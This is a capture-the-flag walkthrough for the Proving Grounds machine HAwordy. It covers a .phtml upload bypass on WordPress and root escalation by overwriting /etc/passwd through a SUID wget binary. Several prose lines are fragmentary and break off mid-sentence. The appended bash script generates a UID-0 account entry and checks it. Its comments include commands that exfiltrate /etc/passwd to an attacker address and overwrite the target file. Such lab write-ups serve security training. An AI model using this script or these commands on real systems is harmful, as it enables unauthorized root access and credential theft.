In this post we exploit HAwordy, one of the Medium-rated machines on OffSec Proving Grounds. This is not a fully detailed walkthrough; I will only go through the important points of the exploit process.
Running wpscan against the WordPress site on port
The .phtml file to upload (a .phtml extension typically gets past an upload filter that only blocks .php, because the default Apache PHP handler still executes .phtml as PHP):
The wget binary on the system has the SUID bit set, so every file it writes is written as root.
That lets us add our own root user to the system by overwriting the /etc/passwd file with wget:
Copying the remote /etc/passwd file to our attack machine.
Creating a new user named
Adding the new user (with UID 0 and a password hash) to the downloaded passwd file.
Uploading the new passwd file to the target machine and overwriting the remote /etc/passwd with it. Check the edited file before the upload: a malformed /etc/passwd can lock everyone, including you, out of the box.
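The passwd-overwrite step above, as an added example that is not code from the original post: it builds the root-equivalent entry for a downloaded copy of the target's /etc/passwd, verifies the password hash locally the same way login does, and sanity-checks the file before it is pushed back through the SUID wget. The username `pwned`, the password `Passw0rd1`, the salt `abcdefgh` and the attacker address `10.10.14.5:8000` are assumptions.

```shell
#!/bin/bash
# Added example, not from the original post. Builds the new root-equivalent
# entry for a downloaded copy of the target's /etc/passwd and checks the
# password hash locally before the file is pushed back through SUID wget.
# Assumptions (hypothetical): username "pwned", password "Passw0rd1",
# salt "abcdefgh", attacker HTTP listener at 10.10.14.5:8000.

set -e

# crypt(3) hash via OpenSSL. -1 is MD5-crypt, which every glibc accepts;
# use -6 (SHA-512) where the openssl build supports it.
make_hash() {
    local pass="$1" salt="$2"
    openssl passwd -1 -salt "$salt" "$pass"
}

# A passwd line with UID 0 and GID 0: any account with UID 0 is root,
# whatever its name. Putting the hash in field 2 means /etc/shadow is
# never consulted for this user, so only /etc/passwd has to be replaced.
make_passwd_line() {
    local user="$1" hash="$2"
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$user" "$hash"
}

# Append the new entry to the local copy of the target's passwd file.
append_user() {
    local file="$1" user="$2" pass="$3" salt="$4"
    make_passwd_line "$user" "$(make_hash "$pass" "$salt")" >> "$file"
}

# Recompute the hash from the salt stored in field 2 and compare, which is
# what login/su do. Returns 0 on match, 1 otherwise.
verify_password() {
    local line="$1" pass="$2" stored salt
    stored=$(printf '%s' "$line" | cut -d: -f2)
    salt=$(printf '%s' "$stored" | cut -d'$' -f3)
    [ "$(openssl passwd -1 -salt "$salt" "$pass")" = "$stored" ]
}

# Sanity-check the whole file before uploading: every line must have
# exactly 7 fields and root must still be UID 0.
check_passwd_file() {
    awk -F: 'BEGIN { bad = 0 }
             NF != 7 { bad = 1 }
             $1 == "root" && $3 != 0 { bad = 1 }
             END { exit bad }' "$1"
}

# Exfiltrating the original file from the target with the SUID wget
# (listener on the attack machine, e.g. nc -lvnp 8000):
#   wget --post-file=/etc/passwd http://10.10.14.5:8000/
# Overwriting it on the target once the edited copy is served from the
# attack machine (e.g. python3 -m http.server 8000 in its directory):
#   wget -O /etc/passwd http://10.10.14.5:8000/passwd
# then: su pwned
```

The hash is generated with `openssl passwd -1` because MD5-crypt is understood by every glibc; on a current target `openssl passwd -6` gives a SHA-512 hash that looks less out of place. Run `check_passwd_file` on the edited copy every time: wget writes the file as root without any validation, and a stray blank line or a missing field in /etc/passwd is the difference between a root shell and a machine nobody can log in to.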